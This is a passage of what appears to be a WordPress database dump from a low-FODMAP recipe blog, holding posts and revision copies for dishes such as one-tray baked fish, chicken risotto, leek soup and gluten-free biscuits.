Drizzle over the olive oil and squeeze over half the lemon. Salt and pepper to taste
Roast in the oven for 20 minutes.
Spoon the lovely juices over the fish and serve\n\n

\n','One tray baked fish & Vegetables','','publish','open','open','','one-tray-baked-fish-vegetables','','','2020-04-05 20:59:08','2020-04-05 20:59:08','',0,'http://tummyrevolution.com/?p=4807',0,'post','',0),(4808,1,'2020-04-05 20:59:36','2020-04-05 20:59:36','\n

\n\nIf you love risotto as much as we do you\'ll just have to try this one. It\'s just so satisfyingly creamy and full of flavour. If you have any leftovers (we\'re doubtful) it does taste fantastic the day after too and you can pop in a container and bring to work for lunch - simply perfect.

\n\n\n\n

It can be a bit tricky to make risotto on the low-FODMAP diet as you generally can\'t use normal stock/stock cubes - it usually contains onion, and you can\'t eat onions on the low-FODMAP diet.

\n\n\n\n

Despair not, we have the solution.
Earlier this week we cooked a whole chicken and made chicken stock at the same time. If you haven\'t seen the post we suggest you take a look. You will see how easy it is to make your own chicken stock that contains no onion, no additives and is full of goodness and flavour.
Today we\'ll be making our beautiful risotto using this lovely stock

\n\n\n\n

Instead of onion we\'ve chosen to use chives and we actually prefer it to onion. It just tastes lighter, cleaner & fresher then onion.

\n\n\n\n

Ingredients
200g pancetta
200g cooked chicken (see cooked chicken and stock post for tips. The chicken can also be your leftovers from roast chicken dinner.
250 grams (1 1/2 cups) Arborio rice
ca 1.2 litre (5 cups) simmering chicken stock (see cooked chicken and stock post for one way to make stock)
100ml (3/4 cup) freshly grated parmasan cheese
2 tbs finely chopped chives
1 tbs chopped fresh sage
1tsp chopped fresh rosemary
60ml (1/2 cup) dry white wine
3 tbs olive oil
1-2 tsb seasalt
1 tsb freshly ground black pepper\n\n

\n','Pancetta, chicken & parmesan risotto','','publish','open','open','','pancetta-chicken-parmesan-risotto','','','2020-04-05 20:59:38','2020-04-05 20:59:38','',0,'http://tummyrevolution.com/?p=4808',0,'post','',0),(4809,1,'2020-04-05 20:59:07','2020-04-05 20:59:07','\n

\n\nOur ideal way of cooking is making food that takes minimum effort, tastes fantastic and is full of nutrition. This is one of those dishes and as an extra bonus it also looks amazing!

\n\n\n\n

This dish is simple, its a throw it all in and let the oven do the work dish and is wonderful and delicious. Oven baked cherry tomatoes really do work wonderfully with fish they have that rich oily taste which pairs great with white fish and the lemon adds a little zest

\n\n\n\n

Served with the green rice we made earlier in the week and you have a superb dinner!

\n\n\n\n

Serves 4

\n\n\n\n

Ingredients

\n\n\n\n

400 grams (2-4pcs) fish fillets like cod, haddock, salmon or monk fish
4 vines of cherry tomatoes
50 g green beans
30 grams black pitted olives
100 grams broccoli florets cut in half or quarters if large
1 lemon, half cut in slices
salt and peper
2 tbsp olive oil
Method

\n\n\n\n

Preheat the oven to 200 °
Place the fish fillets on baking tray
Place all the vegetables and the lemon slices around the fish fillets and sprinkle over the the olives.
Drizzle over the olive oil and squeeze over half the lemon. Salt and pepper to taste
Roast in the oven for 20 minutes.
Spoon the lovely juices over the fish and serve\n\n

\n','One tray baked fish & Vegetables','','inherit','closed','closed','','4807-revision-v1','','','2020-04-05 20:59:07','2020-04-05 20:59:07','',4807,'http://tummyrevolution.com/4807-revision-v1/',0,'revision','',0),(4810,1,'2020-04-05 20:59:36','2020-04-05 20:59:36','\n

\n\nIf you love risotto as much as we do you\'ll just have to try this one. It\'s just so satisfyingly creamy and full of flavour. If you have any leftovers (we\'re doubtful) it does taste fantastic the day after too and you can pop in a container and bring to work for lunch - simply perfect.

\n\n\n\n

It can be a bit tricky to make risotto on the low-FODMAP diet as you generally can\'t use normal stock/stock cubes - it usually contains onion, and you can\'t eat onions on the low-FODMAP diet.

\n\n\n\n

Despair not, we have the solution.
Earlier this week we cooked a whole chicken and made chicken stock at the same time. If you haven\'t seen the post we suggest you take a look. You will see how easy it is to make your own chicken stock that contains no onion, no additives and is full of goodness and flavour.
Today we\'ll be making our beautiful risotto using this lovely stock

\n\n\n\n

Instead of onion we\'ve chosen to use chives and we actually prefer it to onion. It just tastes lighter, cleaner & fresher then onion.

\n\n\n\n

Ingredients
200g pancetta
200g cooked chicken (see cooked chicken and stock post for tips. The chicken can also be your leftovers from roast chicken dinner.
250 grams (1 1/2 cups) Arborio rice
ca 1.2 litre (5 cups) simmering chicken stock (see cooked chicken and stock post for one way to make stock)
100ml (3/4 cup) freshly grated parmasan cheese
2 tbs finely chopped chives
1 tbs chopped fresh sage
1tsp chopped fresh rosemary
60ml (1/2 cup) dry white wine
3 tbs olive oil
1-2 tsb seasalt
1 tsb freshly ground black pepper\n\n

\n','Pancetta, chicken & parmesan risotto','','inherit','closed','closed','','4808-revision-v1','','','2020-04-05 20:59:36','2020-04-05 20:59:36','',4808,'http://tummyrevolution.com/4808-revision-v1/',0,'revision','',0),(4811,1,'2020-04-05 21:00:08','2020-04-05 21:00:08','\n

\n\nWhole chicken is so versatile and you can cook it in so many ways. In the UK we mainly roast whole chicken in the oven. My (Sara\'s) mum on the other hand, would always cook whole chicken in water with carrot, onion, salt and pepper on the stove.
This way of cooking makes the chicken really juicy and tender, ideal if you then want to use the chicken meat for other dishes like salads, risotto, stews etc
You can also freeze the chicken in portion sizes and get it out as and when you need it.
Another really good thing about cooking your chicken this way is that you get a lovely natural home made stock at the end of it. This stock can in turn be used for making soups, broths, stews, risottos etc.

\n\n\n\n

So today we\'re cooking the chicken and making the chicken stock. Later in the week we will be making a risotto using the chicken stock - so stay tuned.

\n\n\n\n

I think you\'ll be surprised at how easy it is to cook a chicken this way and to get lots of lovely stock at the end of it. It should literally take no more then 5-10 minutes to prepare and then it will cook away on the stove until ready.

\n\n\n\n

We\'re swapping the onion for the spring onions (green bit only) and we\'ve added a parsnip to add extra flavour to the stock.

\n\n\n\n

Ingredients

\n\n\n\n

1 whole chicken (1-1 ¼ kg)
1 ½ -2 litre water
2-3 teaspoons seasalt
2-3 tbs roughy chopped spring onion (green part only)
1 carrot cut in chunky bits
1 parsnip cut in chunky bit
8-10 white pepper corns (or mixed pepper corns)
(optional: If you have a bay leave and/or some parsley stalks you can throw these in for extra flavour but it\'s not a necessity)\n\n

\n','Cooked Chicken & Chicken stock','','publish','open','open','','cooked-chicken-chicken-stock','','','2020-04-05 21:00:09','2020-04-05 21:00:09','',0,'http://tummyrevolution.com/?p=4811',0,'post','',0),(4812,1,'2020-04-05 21:00:27','2020-04-05 21:00:27','\n

\n\nThis week we have taken our inspiration from the Cinco de Mayo festival (5th may) which is celebrated in America and Mexico and is a festival of parades food and dancing to celebrate the Mexican victory at the battle of Puebla.

\n\n\n\n

Anyway, the food and dancing sold it for us so we joined the festival spirit by making these delicious low-FODMAP Salmon tortillas.

\n\n\n\n

They might look complicated but they are actually really easy to make so have a go and tell us what you think.

\n\n\n\n

Ingredients

\n\n\n\n

4 x Salmon Fillets (540g)
4 x spring onions (just green parts)
2 yellow tomatoes
2 red tomatoes
lettuce for side salad
1 teaspoon sunflower seeds
1 teaspoon pumpkin seeds
1/4 teaspoon chilli flakes
(the seeds and chilli flakes can often be bought ready mixed)

\n\n\n\n

For sauce topping
125g coconut yogurt
100g Mayonnaise
A squeeze of lemon juice

\n\n\n\n

For tortillas (makes 8)
200g gluten free flour
190ml water
4 tbs olive oil
1/4 tsp salt
1-2 teaspoons Coconut oil or olive oil (for frying)

\n\n\n\n

Method

\n\n\n\n

Make the tortillas first so that you can serve the salmon immediately once cooked.

\n\n\n\n

Tortillas

\n\n\n\n

Mix together the flour, salt, water and 2 tbs of olive oil. The mix should not be dry bit rather like a pancake mix.
Leave it to stand for about 10 minutes
Heat up a small frying pan and add a small amount of coconut oil.
Stir the batter mix and use a ladle to poor about half a ladle of batter into the pan to form a circle.
Cook for a few minutes until air bubbles appear and the tortilla has gained some colour. Turn the tortilla and cook the other side the same way. Place on a plate and repeat until all the butter has been used.
Preheat oven to fan 180.c

\n\n\n\n

Salmon

\n\n\n\n

Place the salmon in a baking tray lined with baking paper
Season the salmon with sea salt and pepper
Place it in the middle of the oven and cook for about 10-15 minutes until salmon is light pink all over.
While the salmon cooks mix the coconut yogurt, mayonnaise and lemon juice together.
Chop up the tomatoes, sprain onions (green bits) and place in small side dishes. Chop and mix the seeds if not already mixed and place in another side dish.\n\n

\n','Tacos','','private','open','open','','tacos','','','2020-04-27 10:38:15','2020-04-27 10:38:15','',0,'http://tummyrevolution.com/?p=4812',0,'post','',0),(4813,1,'2020-04-05 21:00:08','2020-04-05 21:00:08','\n

\n\nWhole chicken is so versatile and you can cook it in so many ways. In the UK we mainly roast whole chicken in the oven. My (Sara\'s) mum on the other hand, would always cook whole chicken in water with carrot, onion, salt and pepper on the stove.
This way of cooking makes the chicken really juicy and tender, ideal if you then want to use the chicken meat for other dishes like salads, risotto, stews etc
You can also freeze the chicken in portion sizes and get it out as and when you need it.
Another really good thing about cooking your chicken this way is that you get a lovely natural home made stock at the end of it. This stock can in turn be used for making soups, broths, stews, risottos etc.

\n\n\n\n

So today we\'re cooking the chicken and making the chicken stock. Later in the week we will be making a risotto using the chicken stock - so stay tuned.

\n\n\n\n

I think you\'ll be surprised at how easy it is to cook a chicken this way and to get lots of lovely stock at the end of it. It should literally take no more then 5-10 minutes to prepare and then it will cook away on the stove until ready.

\n\n\n\n

We\'re swapping the onion for the spring onions (green bit only) and we\'ve added a parsnip to add extra flavour to the stock.

\n\n\n\n

Ingredients

\n\n\n\n

1 whole chicken (1-1 ¼ kg)
1 ½ -2 litre water
2-3 teaspoons seasalt
2-3 tbs roughy chopped spring onion (green part only)
1 carrot cut in chunky bits
1 parsnip cut in chunky bit
8-10 white pepper corns (or mixed pepper corns)
(optional: If you have a bay leave and/or some parsley stalks you can throw these in for extra flavour but it\'s not a necessity)\n\n

\n','Cooked Chicken & Chicken stock','','inherit','closed','closed','','4811-revision-v1','','','2020-04-05 21:00:08','2020-04-05 21:00:08','',4811,'http://tummyrevolution.com/4811-revision-v1/',0,'revision','',0),(4814,1,'2020-04-05 21:00:27','2020-04-05 21:00:27','\n

\n\nThis week we have taken our inspiration from the Cinco de Mayo festival (5th may) which is celebrated in America and Mexico and is a festival of parades food and dancing to celebrate the Mexican victory at the battle of Puebla.

\n\n\n\n

Anyway, the food and dancing sold it for us so we joined the festival spirit by making these delicious low-FODMAP Salmon tortillas.

\n\n\n\n

They might look complicated but they are actually really easy to make so have a go and tell us what you think.

\n\n\n\n

Ingredients

\n\n\n\n

4 x Salmon Fillets (540g)
4 x spring onions (just green parts)
2 yellow tomatoes
2 red tomatoes
lettuce for side salad
1 teaspoon sunflower seeds
1 teaspoon pumpkin seeds
1/4 teaspoon chilli flakes
(the seeds and chilli flakes can often be bought ready mixed)

\n\n\n\n

For sauce topping
125g coconut yogurt
100g Mayonnaise
A squeeze of lemon juice

\n\n\n\n

For tortillas (makes 8)
200g gluten free flour
190ml water
4 tbs olive oil
1/4 tsp salt
1-2 teaspoons Coconut oil or olive oil (for frying)

\n\n\n\n

Method

\n\n\n\n

Make the tortillas first so that you can serve the salmon immediately once cooked.

\n\n\n\n

Tortillas

\n\n\n\n

Mix together the flour, salt, water and 2 tbs of olive oil. The mix should not be dry bit rather like a pancake mix.
Leave it to stand for about 10 minutes
Heat up a small frying pan and add a small amount of coconut oil.
Stir the batter mix and use a ladle to poor about half a ladle of batter into the pan to form a circle.
Cook for a few minutes until air bubbles appear and the tortilla has gained some colour. Turn the tortilla and cook the other side the same way. Place on a plate and repeat until all the butter has been used.
Preheat oven to fan 180.c

\n\n\n\n

Salmon

\n\n\n\n

Place the salmon in a baking tray lined with baking paper
Season the salmon with sea salt and pepper
Place it in the middle of the oven and cook for about 10-15 minutes until salmon is light pink all over.
While the salmon cooks mix the coconut yogurt, mayonnaise and lemon juice together.
Chop up the tomatoes, sprain onions (green bits) and place in small side dishes. Chop and mix the seeds if not already mixed and place in another side dish.\n\n

\n','Tacos','','inherit','closed','closed','','4812-revision-v1','','','2020-04-05 21:00:27','2020-04-05 21:00:27','',4812,'http://tummyrevolution.com/4812-revision-v1/',0,'revision','',0),(4815,1,'2020-04-05 21:00:58','2020-04-05 21:00:58','\n

\n\nNow that the weather is getting better there\'s people eating ice-creams everywhere. You are a bit restricted when it comes to ice-creams when it come to the low-FODMAP diet so we thought we\'d try making our own sorbet.
If you have sweet craving like us this sorbet will definately help you out and once it\'s done you can keep it in the freezer for when you get that craving next time. It\'s really easy to make and full taste.

\n\n\n\n

Ingredients
900 grams Strawberries
3 tbs Lemon juice from fresh lemons
150 grams Maple Syrup
2 tsp vanilla extract
Seeds of one vanilla pod (optional)

\n\n\n\n

Rinse the strawberries and place all ingredients in a blender or food processor.
Bled until smooth.
Poor into a tub and stick it in the freezer\n\n

\n','Strawberry sorbet','','private','open','open','','strawberry-sorbet','','','2020-04-27 10:33:26','2020-04-27 10:33:26','',0,'http://tummyrevolution.com/?p=4815',0,'post','',0),(4816,1,'2020-04-05 21:01:14','2020-04-05 21:01:14','\n

\n\nWe\'re trying out a moroccan inspired salad today using Sumac which is a new spice to us. Sumac is a tangy sweet and sour moroccan spice that works brilliantly, adding zest to a salad. It pairs very well with the sweet potato and tastes delicious with the kale and quinoa. This is a great dish for lunch and a great way to eat more of the nutrient packed kale. We\'ve topped our dish with toasted walnuts for added crunch and olives for a little saltiness.

\n\n\n\n

A delicious FODMAP lunch....

\n\n\n\n

Serves 4

\n\n\n\n

Ingredients

\n\n\n\n

2 medium sized potatos
2-3 carrots
1 Parsnips
2 big handful of Kale
1 -2 table spoons Olive oil
Sea salt and Pepper for the vegetables
100 grams (1 cup) Quinoa, white
4 Spring onions (green bit only, white bit is high FODMAP)
15 Black pitted olives
A hand full of Walnuts

\n\n\n\n

For the dressing
2 tbs Olive oil
1/2 tsp Mustard
1 tbs Maple syrup
2 teaspoons Sumac
1/2 a squeezed lemon
salt & back pepper to taste

\n\n\n\n

Instructions

\n\n\n\n

1. Preheat the oven to 200C (180C fan)
2. Peal and chop the carrots, potato and parsnip. Place in a baking tray and toss in olive oil, salt and pepper. Place in oven to roast for about 15-20 minutes.
3. Whilst the vegetables are roasting, rinse the quinoa in a strainer and rinse under water until clear.
4. Place the quinoa in a saucepan and add about 2 cups of water. Bring to boil and cook for about 10-15 mints until soft. Rinse in a strainer under cold water.
5. Take the vegetables out of the oven once roasted and let them cool.
6. Blanche the Kale in boiling water for a few seconds and strain the water. Let it cool for a few minutes.
7. Chop and dry roast the walnuts in a frying pan for a minute or so
8. Place the kale, quinoa, carrots, potatoes, parsnip and olives in a salad bowl or on a big plate. Add the spring onion and walnuts.
9. Mix all the ingredients of the dressing and drizzle over the salad

\n\n\n\n

Serve with some shaved parmesan.\n\n

\n','Morrocan inspired roast vegetables, kale and quinoa salad','','private','open','open','','morrocan-inspired-roast-vegetables-kale-and-quinoa-salad','','','2020-04-27 10:39:49','2020-04-27 10:39:49','',0,'http://tummyrevolution.com/?p=4816',0,'post','',0),(4817,1,'2020-04-05 21:00:58','2020-04-05 21:00:58','\n

\n\nNow that the weather is getting better there\'s people eating ice-creams everywhere. You are a bit restricted when it comes to ice-creams when it come to the low-FODMAP diet so we thought we\'d try making our own sorbet.
If you have sweet craving like us this sorbet will definately help you out and once it\'s done you can keep it in the freezer for when you get that craving next time. It\'s really easy to make and full taste.

\n\n\n\n

Ingredients
900 grams Strawberries
3 tbs Lemon juice from fresh lemons
150 grams Maple Syrup
2 tsp vanilla extract
Seeds of one vanilla pod (optional)

\n\n\n\n

Rinse the strawberries and place all ingredients in a blender or food processor.
Bled until smooth.
Poor into a tub and stick it in the freezer\n\n

\n','Strawberry sorbet','','inherit','closed','closed','','4815-revision-v1','','','2020-04-05 21:00:58','2020-04-05 21:00:58','',4815,'http://tummyrevolution.com/4815-revision-v1/',0,'revision','',0),(4818,1,'2020-04-05 21:01:14','2020-04-05 21:01:14','\n

\n\nWe\'re trying out a moroccan inspired salad today using Sumac which is a new spice to us. Sumac is a tangy sweet and sour moroccan spice that works brilliantly, adding zest to a salad. It pairs very well with the sweet potato and tastes delicious with the kale and quinoa. This is a great dish for lunch and a great way to eat more of the nutrient packed kale. We\'ve topped our dish with toasted walnuts for added crunch and olives for a little saltiness.

\n\n\n\n

A delicious FODMAP lunch....

\n\n\n\n

Serves 4

\n\n\n\n

Ingredients

\n\n\n\n

2 medium sized potatos
2-3 carrots
1 Parsnips
2 big handful of Kale
1 -2 table spoons Olive oil
Sea salt and Pepper for the vegetables
100 grams (1 cup) Quinoa, white
4 Spring onions (green bit only, white bit is high FODMAP)
15 Black pitted olives
A hand full of Walnuts

\n\n\n\n

For the dressing
2 tbs Olive oil
1/2 tsp Mustard
1 tbs Maple syrup
2 teaspoons Sumac
1/2 a squeezed lemon
salt & back pepper to taste

\n\n\n\n

Instructions

\n\n\n\n

1. Preheat the oven to 200C (180C fan)
2. Peal and chop the carrots, potato and parsnip. Place in a baking tray and toss in olive oil, salt and pepper. Place in oven to roast for about 15-20 minutes.
3. Whilst the vegetables are roasting, rinse the quinoa in a strainer and rinse under water until clear.
4. Place the quinoa in a saucepan and add about 2 cups of water. Bring to boil and cook for about 10-15 mints until soft. Rinse in a strainer under cold water.
5. Take the vegetables out of the oven once roasted and let them cool.
6. Blanche the Kale in boiling water for a few seconds and strain the water. Let it cool for a few minutes.
7. Chop and dry roast the walnuts in a frying pan for a minute or so
8. Place the kale, quinoa, carrots, potatoes, parsnip and olives in a salad bowl or on a big plate. Add the spring onion and walnuts.
9. Mix all the ingredients of the dressing and drizzle over the salad

\n\n\n\n

Serve with some shaved parmesan.\n\n

\n','Morrocan inspired roast vegetables, kale and quinoa salad','','inherit','closed','closed','','4816-revision-v1','','','2020-04-05 21:01:14','2020-04-05 21:01:14','',4816,'http://tummyrevolution.com/4816-revision-v1/',0,'revision','',0),(4819,1,'2020-04-12 03:54:00','2020-04-12 03:54:00','\n

We thought we\'d share this delicious green smoothie as we know there are still some people out there who boycott them, hahaa. The green colour makes us think it won\'t be nice but trust us mixed with the right ingredients it can taste amazing - like this one!

On the low-FODMAP diet you should only have one serving of fruit per meal so this healthy green smoothie is much better then an all fruit version.

This smoothie has 2 servings of fruit but it makes two glasses so you can either share (which we like) or keep one covered in the fridge for another meal or the next day.

To make this you\'ll need a smoothie maker like a Nutribullet or similar.

\n\n\n\n
\"\"
\n\n\n\n

Makes two glasses

Ingredients
One large handful of spinach
1/2 banana
1/2 cup of chopped pineapple chunks
1/2 teaspoon chia seeds
1 teaspoon of sunflower seeds and/or pumpkin seeds
150ml almond milk (2/3 cup)
1 vanilla pod (seeds of)
A splash of maple syrup (optional)
Ice

Place all the ingredients into the smoothie mixer and mix until smooth. Serve in your favourite cup/glass and enjoy!

\n\n\n\n
\"\"
\n','Green smoothie with spinach, pineapple & banana','','publish','open','open','','our-favourite-green-smoothie','','','2020-04-19 06:35:06','2020-04-19 06:35:06','',0,'http://tummyrevolution.com/?p=4819',0,'post','',0),(4820,1,'2020-04-05 21:01:53','2020-04-05 21:01:53','\n
\"\"/
\n\n\n\n

If you haven’t already tried chia seeds this is a great way of intoducing this amazing super food into your daily life.
Chia seeds have lots of health benefits as its high in fibre, omega-3fats, proteins vitamins and minerals. Chia seeds in themselves don’t have that much of a flavour which means they are very easy to add to almost every meal. Chia seed pudding is very easy and quick to make which makes it a great breakfast. YOu’ll need to make it in advance which means you can make it in the evening and have your breakfast ready for those busy mornings. It only takes a few minutes to make add it’s absolutely delicious. It also works great as a desert.

\n\n\n\n

Makes 1 serving/jar
1/4 cup (4 tablespoons) chia seeds 1 cup (200 ml) lactose free milk/ alsmond milk/ rice milk 1 teaspoon maple syrup 2-3 drops vanilla extract

TOPPINGS 
mix of 5 raspberries, 5 blueberries, 5 strawberries

\n\n\n\n

or

\n\n\n\n

A half a sliced banana 

\n\n\n\n

and/or

\n\n\n\n

A few chopped up walnuts, maccediemia nuts 

\n\n\n\n

Directions
In a jar or container with lid, ix all the ingredients together apart from the berries. Store in the fridge over night or at least 1-2 hours. Serve with the berries of your chose and some chopped up nuts.

\n','Chia seed pudding','','private','open','open','','chia-seed-pudding','','','2020-04-27 10:30:59','2020-04-27 10:30:59','',0,'http://tummyrevolution.com/?p=4820',0,'post','',0),(4821,1,'2020-04-05 21:01:36','2020-04-05 21:01:36','\n

We thought we\'d share this delicious green smoothie as we know there are still some people out there who boycott them, hahaa. The green colour makes us think it won\'t be nice but trust us mixed with the right ingredients it can taste amazing - like this one!

On the low-FODMAP diet you should only have one serving of fruit per meal so this healthy green smoothie is much better then an all fruit version.

This smoothie has 2 servings of fruit but it makes two glasses so you can either share (which we like) or keep one covered in the fridge for another meal or the next day.

To make this you\'ll need a smoothie maker like a Nutribullet or similar.

\n\n\n\n

Makes two glasses

Ingredients
One large handful of spinach
1/2 banana
1/2 cup of chopped pineapple chunks
1/2 teaspoon chia seeds
1 teaspoon of sunflower seeds and/or pumpkin seeds
150ml almond milk (2/3 cup)
1 vanilla pod (seeds of)
A splash of maple syrup (optional)
Ice

Place all the ingredients into the smoothie mixer and mix until smooth. Serve in your favourite cup/glass and enjoy!

\n','Our favourite green smoothie','','inherit','closed','closed','','4819-revision-v1','','','2020-04-05 21:01:36','2020-04-05 21:01:36','',4819,'http://tummyrevolution.com/4819-revision-v1/',0,'revision','',0),(4822,1,'2020-04-05 21:01:53','2020-04-05 21:01:53','\n
\"\"/
\n\n\n\n

If you haven’t already tried chia seeds this is a great way of intoducing this amazing super food into your daily life.
Chia seeds have lots of health benefits as its high in fibre, omega-3fats, proteins vitamins and minerals. Chia seeds in themselves don’t have that much of a flavour which means they are very easy to add to almost every meal. Chia seed pudding is very easy and quick to make which makes it a great breakfast. YOu’ll need to make it in advance which means you can make it in the evening and have your breakfast ready for those busy mornings. It only takes a few minutes to make add it’s absolutely delicious. It also works great as a desert.

\n\n\n\n

Makes 1 serving/jar
1/4 cup (4 tablespoons) chia seeds 1 cup (200 ml) lactose free milk/ alsmond milk/ rice milk 1 teaspoon maple syrup 2-3 drops vanilla extract

TOPPINGS 
mix of 5 raspberries, 5 blueberries, 5 strawberries

\n\n\n\n

or

\n\n\n\n

A half a sliced banana 

\n\n\n\n

and/or

\n\n\n\n

A few chopped up walnuts, maccediemia nuts 

\n\n\n\n

Directions
In a jar or container with lid, ix all the ingredients together apart from the berries. Store in the fridge over night or at least 1-2 hours. Serve with the berries of your chose and some chopped up nuts.

\n','Chia seed pudding','','inherit','closed','closed','','4820-revision-v1','','','2020-04-05 21:01:53','2020-04-05 21:01:53','',4820,'http://tummyrevolution.com/4820-revision-v1/',0,'revision','',0),(4823,1,'2020-04-05 21:02:16','2020-04-05 21:02:16','\n
\"Potato
\n\n\n\n

There is certainly a nip in the air this week so it is time to whip up a heart warming soup. Leeks are high Fodmap but like spring onions you can use the green parts so we got to work on a classic leek and potato soup

This smooth creamy vegetable soup is full of flavour and simple to make so there really are no excuses

Serves 2 (with a second helping)

Ingredients

4 medium size potatoes
The green part of 2 leeks
500ml homemade chicken stock
A tablespoon tamari
A pinch of time
salt and pepper to taste
A swirl of lactose free cream to decorate

Method

Peel potatoes and chop into chunks and slice the green parts of the leek
Put it all into a saucepan, add chicken stock and bring to the boil
Reduce the heat to simmer for about 20-25 minutes until vegetables are soft
Whizz with a hand blender just for a few seconds don\'t over blend you need some vegetables left chunky
Stir in tamari and add salt and pepper to taste
Finish with a swirl of cream
Delicious served with gluten free bread and a chunk of cheese

\n\n\n\n
\"\"/
\n','Potato & Leek Soup','','publish','open','open','','potato-leek-soup','','','2020-04-05 21:02:18','2020-04-05 21:02:18','',0,'http://tummyrevolution.com/?p=4823',0,'post','',0),(4824,1,'2020-04-05 21:02:33','2020-04-05 21:02:33','\n

\n\nThis is one of the recipes going into our FREE 7-Day tummy taming plan.Please feel free to try it out and any feedback is welcome :-)

\n\n\n\n
\"\"/
\n','Tummy Loving Stir Fry','','publish','open','open','','tummy-loving-stir-fry','','','2020-04-05 21:02:35','2020-04-05 21:02:35','',0,'http://tummyrevolution.com/?p=4824',0,'post','',0),(4825,1,'2020-04-05 21:02:16','2020-04-05 21:02:16','\n
\"Potato
\n\n\n\n

There is certainly a nip in the air this week so it is time to whip up a heart warming soup. Leeks are high Fodmap but like spring onions you can use the green parts so we got to work on a classic leek and potato soup

This smooth creamy vegetable soup is full of flavour and simple to make so there really are no excuses

Serves 2 (with a second helping)

Ingredients

4 medium size potatoes
The green part of 2 leeks
500ml homemade chicken stock
A tablespoon tamari
A pinch of time
salt and pepper to taste
A swirl of lactose free cream to decorate

Method

Peel potatoes and chop into chunks and slice the green parts of the leek
Put it all into a saucepan, add chicken stock and bring to the boil
Reduce the heat to simmer for about 20-25 minutes until vegetables are soft
Whizz with a hand blender just for a few seconds don\'t over blend you need some vegetables left chunky
Stir in tamari and add salt and pepper to taste
Finish with a swirl of cream
Delicious served with gluten free bread and a chunk of cheese

\n\n\n\n
\"\"/
\n','Potato & Leek Soup','','inherit','closed','closed','','4823-revision-v1','','','2020-04-05 21:02:16','2020-04-05 21:02:16','',4823,'http://tummyrevolution.com/4823-revision-v1/',0,'revision','',0),(4826,1,'2020-04-05 21:02:33','2020-04-05 21:02:33','\n

\n\nThis is one of the recipes going into our FREE 7-Day tummy taming plan.Please feel free to try it out and any feedback is welcome :-)

\n\n\n\n
\"\"/
\n','Tummy Loving Stir Fry','','inherit','closed','closed','','4824-revision-v1','','','2020-04-05 21:02:33','2020-04-05 21:02:33','',4824,'http://tummyrevolution.com/4824-revision-v1/',0,'revision','',0),(4827,1,'2020-04-05 21:02:57','2020-04-05 21:02:57','\n

Salmon is an oily fish - rich in omega 3. This quick lunch is packed full of delicious zesty, clean flavours and takes minutes to prepare.  We paired the salmon with a boiled egg, watercress, spinach and added pine nuts for a delightful crunch. We also added some cucumber and yellow and red tomatoes which makes this dish look so colourful.

\n\n\n\n

Ingredients

Makes 2 bowls

100g smoked salmon
4 eggs
a handful of pine nuts
a handful of fresh dill
1/4 cucumber, sliced
2 red tomatoes, sliced
2 yellow tomatoes, sliced
4 handfuls of watercress
2 handfuls of spinach
3 spring onions (green parts), sliced

For the dressing:

juice of 1/2 a lemon and 1/2 a lime
3 tbsp olive oil
sea salt and black pepper

Method

\n\n\n\n

1. Cut any large stalks off the watercress and arrange in 2 bowls along with the spinach

\n\n\n\n

2. Arrange the tomatoes and cucumber on the watercress and spinach and sprinkle the spring onions on top

\n\n\n\n

3. Bring a pan of water to boil and gently place the eggs in for 6-7 minutes, once done set aside to cool

\n\n\n\n

4. Toast pine nuts in a dry frying pan and also set aside to cool

\n\n\n\n

5. Once cooled, peel the eggs from their shells and slice. Lay the sliced eggs on the salad, with twisted smoked salmon and sprinkle the pine nuts on top.

\n\n\n\n

6. To make the dressing: mix all the ingredients and drizzle over the salmon salad, then top with the fresh dill and tuck in...

\n\n\n\n
\"\"/
\n','Smoked Salmon Salad','','publish','open','open','','smoked-salmon-salad','','','2020-04-06 23:42:26','2020-04-06 23:42:26','',0,'http://tummyrevolution.com/?p=4827',0,'post','',0),(4828,1,'2020-04-05 21:03:13','2020-04-05 21:03:13','\n

What could be better than a biscuit and a cup of tea???

We have called these our \'Dream Biscuits\', at Tummy Revolution.  They are a light, uplifting, crumbly biscuit that goes hand in hand with your drink of choice.

Since becoming low-fodmappers we have dramatically cut down on our sugars. Especially refined sugars and have substituted most of our naught treats with more heather options.  Having said that, we still miss our old treats from time to time, biscuits being one of them.

\n\n\n\n


In most of our cooking we try to substitute refined sugar and flour for more natural options like maple syrup, buckwheat or blown rice flour. When making these biscuits you can substitute the white sugar with coconut sugar and the rapeseed oil with coconut oil. Whether you choose to go down the white sugar or the coconut sugar route is up to you. All we can promise is you\'ll get some lovely biscuits either way. The white sugar biscuits are very light and lemony whilst the coconut sugar once have an almost caramel like flavour to them.  In terms of the flour, we stuck to \'Doves Gluten Free Flour Mix,\' as we thought the biscuits tasted best using this flour. We have made a few cakes and biscuits using other flours but we haven\'t been very impressed with the results and the taste has not been right for us.  One of our key principles is that we won\'t compromise on flavour so if something doesn\'t taste good we won\'t post it or suggest you make.

You won\'t be disappointed with the results here …just don\'t eat them all at once!

Ingredients

\n\n\n\n

Makes 20

\n\n\n\n

75g butter (room temperature)
150g sugar or 75g coconut sugar
60g rapeseed oil or coconut oil
1 tsp psyllium husk
1/2 tsp bicarbonate soda
1/2 lemon, grated peel and the juice
180g gluten free flour

Method

1. Set the oven to 160ºC
2. Place some baking paper on an oven tray
3. Mix the butter, sugar and oil together to form a sticky dough
4. Add the psyllium husk, lemon zest and bicarbonate soda
5. Squeeze in the juice of half a lemon and mix well
6. Finally, add the flour and mix until a dough is formed
7. Shape the dough into small balls and place on the oven tray (don\'t put them too close together, as they will spread out when being bakes so they need a bit of space)
8. Bake in the middle of the oven for 18-22 min, until slightly golden 

\n\n\n\n
\"dream
\n\n\n\n
\"\"/
\n','Dream Biscuits','','publish','open','open','','dream-biscuits','','','2020-04-06 23:41:57','2020-04-06 23:41:57','',0,'http://tummyrevolution.com/?p=4828',0,'post','',0),(4829,1,'2020-04-05 21:02:57','2020-04-05 21:02:57','\n

Salmon is an oily fish - rich in omega 3. This quick lunch is packed full of delicious zesty, clean flavours and takes minutes to prepare.  We paired the salmon with a boiled egg, watercress, spinach and added pine nuts for a delightful crunch. We also added some cucumber and yellow and red tomatoes which makes this dish look so colourful.

\n\n\n\n

Ingredients

Makes 2 bowls

100g smoked salmon
4 eggs
a handful of pine nuts
a handful of fresh dill
1/4 cucumber, sliced
2 red tomatoes, sliced
2 yellow tomatoes, sliced
4 handfuls of watercress
2 handfuls of spinach
3 spring onions (green parts), sliced

For the dressing:

juice of 1/2 a lemon and 1/2 a lime
3 tbsp olive oil
sea salt and black pepper

Method

\n\n\n\n

1. Cut any large stalks off the watercress and arrange in 2 bowls along with the spinach

\n\n\n\n

